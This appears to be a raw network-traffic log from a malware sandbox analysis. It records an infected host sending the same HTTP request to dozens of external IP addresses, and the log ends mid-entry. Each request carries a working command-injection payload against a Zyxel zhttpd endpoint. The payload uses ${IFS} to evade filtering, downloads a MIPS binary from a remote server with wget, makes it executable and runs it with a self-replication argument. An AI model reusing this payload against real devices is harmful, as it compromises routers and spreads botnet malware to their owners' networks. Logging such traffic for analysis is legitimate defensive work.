                                          Jan 14, 2024 15:46:21.097527981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5457192.168.2.235377065.16.169.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097541094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5458192.168.2.2354102164.255.236.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097562075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5459192.168.2.234055497.90.251.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097624063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5460192.168.2.2350168121.134.67.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097635031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5461192.168.2.2352928124.41.85.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097657919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5462192.168.2.2350788207.180.135.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097677946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5463192.168.2.235092434.12.184.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097707987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5464192.168.2.2360354199.116.184.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097719908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5465192.168.2.234462837.173.173.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097739935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5466192.168.2.2344640130.192.252.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097747087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5467192.168.2.23362449.141.172.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097759962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5468192.168.2.234211062.17.113.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097770929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5469192.168.2.235625463.81.1.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097800970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5470192.168.2.2340248154.165.141.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097821951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5471192.168.2.2337182107.114.138.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097856998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5472192.168.2.2339874176.7.149.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097872019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5473192.168.2.2333464223.216.253.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097893953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5474192.168.2.235465232.158.21.0443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097903967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5475192.168.2.234889495.75.70.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097963095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5476192.168.2.234600068.114.156.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097981930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5477192.168.2.2354474183.90.74.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.097990990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5478192.168.2.2360234123.33.62.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098016024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5479192.168.2.2358440197.146.116.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098053932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5480192.168.2.236011871.48.6.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098078012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5481192.168.2.235091274.130.247.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098119974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5482192.168.2.2355498188.230.166.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098135948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5483192.168.2.235676625.163.12.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098150969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5484192.168.2.2343864177.127.212.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098186970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5485192.168.2.2351402115.26.151.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098238945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5486192.168.2.235134474.63.224.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098254919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5487192.168.2.234588412.190.227.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098263979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5488192.168.2.2340974159.104.108.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098304987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5489192.168.2.2348198107.136.183.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098330021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5490192.168.2.2335000114.78.247.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098335981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5491192.168.2.2358450131.240.99.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098406076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5492192.168.2.235205672.186.218.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098428011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5493192.168.2.2348164118.115.254.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098445892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5494192.168.2.2357844116.223.59.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098464012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5495192.168.2.2344518112.77.91.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098500967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5496192.168.2.2337630167.16.177.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098505020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5497192.168.2.2335080183.80.59.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098570108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5498192.168.2.23608484.120.83.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098582029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5499192.168.2.2339954112.226.177.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098587990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5500192.168.2.2342752126.130.60.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098639011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5501192.168.2.23470204.135.157.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098648071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5502192.168.2.2354372167.191.237.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098674059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5503192.168.2.2346638122.124.177.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098726988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5504192.168.2.2354256187.168.19.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098756075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5505192.168.2.2347634144.165.189.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098771095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5506192.168.2.236022624.125.112.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098788023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5507192.168.2.2348464154.89.67.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098809958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5508192.168.2.234623860.226.86.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098824024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5509192.168.2.2344100105.65.129.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098850012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5510192.168.2.2334074222.5.122.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098875046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5511192.168.2.2359522169.115.122.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098923922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5512192.168.2.2360624143.144.218.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098929882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5513192.168.2.235697882.177.49.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098980904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5514192.168.2.2359506112.32.125.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098994017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5515192.168.2.236094694.34.49.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.098995924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5516192.168.2.2335268186.180.59.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099023104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5517192.168.2.234763620.102.160.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099066973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5518192.168.2.235554053.69.125.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:21.099085093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5519192.168.2.233902075.153.208.63443
                                          TimestampBytes transferredDirectionData
